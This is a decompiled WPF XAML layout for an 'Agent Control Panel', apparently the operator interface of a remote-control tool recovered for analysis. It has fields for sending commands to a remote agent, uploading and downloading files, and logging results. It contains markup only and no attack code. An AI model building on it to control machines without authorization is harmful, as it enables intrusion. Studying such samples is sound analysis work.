Glimpse/panel/newPanel-dbg_decompiled_src/newPanel/controlPanel.xaml

<Window
	x:Class="newPanel.controlPanel" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:d="http://schemas.microsoft.com/expression/blend/2008" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:local="clr-namespace:newPanel"
	Title="Agent Control Panel"
	Height="500"
	Width="800"
	Closing="OnWindowClosing">
	<Grid
		Name="myGrid">
		<TabControl
			HorizontalAlignment="Left"
			Height="109"
			Margin="10,45,0,0"
			VerticalAlignment="Top"
			Width="772">
			<TabItem
				Header="Command"
				Margin="-2,-2,-27,0">
				<Grid
					Background="#FFE5E5E5">
					<TextBox
						Name="command"
						HorizontalAlignment="Left"
						Height="23"
						Margin="10,10,0,0"
						TextWrapping="Wrap"
						Text=""
						VerticalAlignment="Top"
						Width="746"
						KeyDown="OnKeyDownHandler" />
					<Button
						Content="Send"
						HorizontalAlignment="Left"
						Margin="681,38,0,0"
						VerticalAlignment="Top"
						Width="75"
						Click="Button_Click_1" />
				</Grid>
			</TabItem>
			<TabItem
				Header="Upload"
				Margin="28,-2,-63,0">
				<Grid
					Background="#FFE5E5E5">
					<TextBox
						Name="upload_addrs"
						HorizontalAlignment="Left"
						Height="23"
						Margin="10,10,0,0"
						TextWrapping="Wrap"
						Text=""
						VerticalAlignment="Top"
						Width="746" />
					<Button
						Content="Upload"
						HorizontalAlignment="Left"
						Margin="681,38,0,0"
						VerticalAlignment="Top"
						Width="75"
						Click="Button_Click_2" />
					<Button
						Content="Browse"
						HorizontalAlignment="Left"
						Height="22"
						Margin="680,10,0,0"
						VerticalAlignment="Top"
						Width="75"
						Click="Button_Click" />
				</Grid>
			</TabItem>
			<TabItem
				Header="Download"
				Margin="64,-2,-99,0">
				<Grid
					Background="#FFE5E5E5">
					<TextBox
						Name="download_addrs"
						HorizontalAlignment="Left"
						Height="23"
						Margin="10,10,0,0"
						TextWrapping="Wrap"
						VerticalAlignment="Top"
						Width="746" />
					<Button
						Content="Download"
						HorizontalAlignment="Left"
						Margin="681,38,0,0"
						VerticalAlignment="Top"
						Width="75"
						Click="Button_Click_3" />
				</Grid>
			</TabItem>
		</TabControl>
		<DataGrid
			Name="commands_dg"
			AutoGenerateColumns="False"
			RowHeaderWidth="0"
			HorizontalAlignment="Left"
			Height="300"
			Margin="10,159,0,0"
			VerticalAlignment="Top"
			Width="772"
			IsReadOnly="True"
			GridLinesVisibility="Horizontal"
			ColumnWidth="*"
			ItemsSource="{Binding}">
			<DataGrid.Columns>
				<DataGridTextColumn
					Width="30"
					Header=" # "
					IsReadOnly="True"
					Binding="{Binding count}" />
				<DataGridTextColumn
					Width="80"
					Header="Type"
					IsReadOnly="True"
					Binding="{Binding type}" />
				<DataGridTextColumn
					Width="200"
					Header="CMD"
					IsReadOnly="True"
					Binding="{Binding cmd}" />
				<DataGridTextColumn
					Width="50"
					Header="State"
					IsReadOnly="True"
					Binding="{Binding state}" />
				<DataGridTextColumn
					Width="150"
					Header="Date"
					IsReadOnly="True"
					Binding="{Binding date}" />
				<DataGridTextColumn
					Header="Result"
					IsReadOnly="True"
					Binding="{Binding result}" />
			</DataGrid.Columns>
			<ItemsControl.ItemContainerStyle>
				<!--Unknown connection ID: 11-->
				<Style
					TargetType="{x:Type DataGridRow}" />
			</ItemsControl.ItemContainerStyle>
		</DataGrid>
		<Label
			Name="id"
			Content="Label"
			HorizontalAlignment="Left"
			Margin="42,10,0,0"
			VerticalAlignment="Top" />
		<Label
			Name="ip"
			Content="Label"
			HorizontalAlignment="Left"
			Margin="385,10,0,0"
			VerticalAlignment="Top" />
		<Label
			Content="ID: "
			HorizontalAlignment="Left"
			Margin="10,10,0,0"
			VerticalAlignment="Top" />
		<Label
			Content="IP: "
			HorizontalAlignment="Left"
			Margin="354,10,0,0"
			VerticalAlignment="Top" />
		<Button
			Name="refresher"
			Content="Refresh"
			HorizontalAlignment="Left"
			Margin="707,10,0,0"
			VerticalAlignment="Top"
			Width="75"
			Click="refresher_Click" />
		<Button
			Name="connection_type"
			Content="text mode"
			HorizontalAlignment="Left"
			Margin="707,35,0,0"
			VerticalAlignment="Top"
			Width="75"
			Height="21"
			Click="connection_type_Click" />
		<Label
			Name="LastActivity"
			Content="0"
			HorizontalAlignment="Left"
			Margin="526,10,0,0"
			VerticalAlignment="Top"
			RenderTransformOrigin="1.129,0.923" />
	</Grid>
</Window>
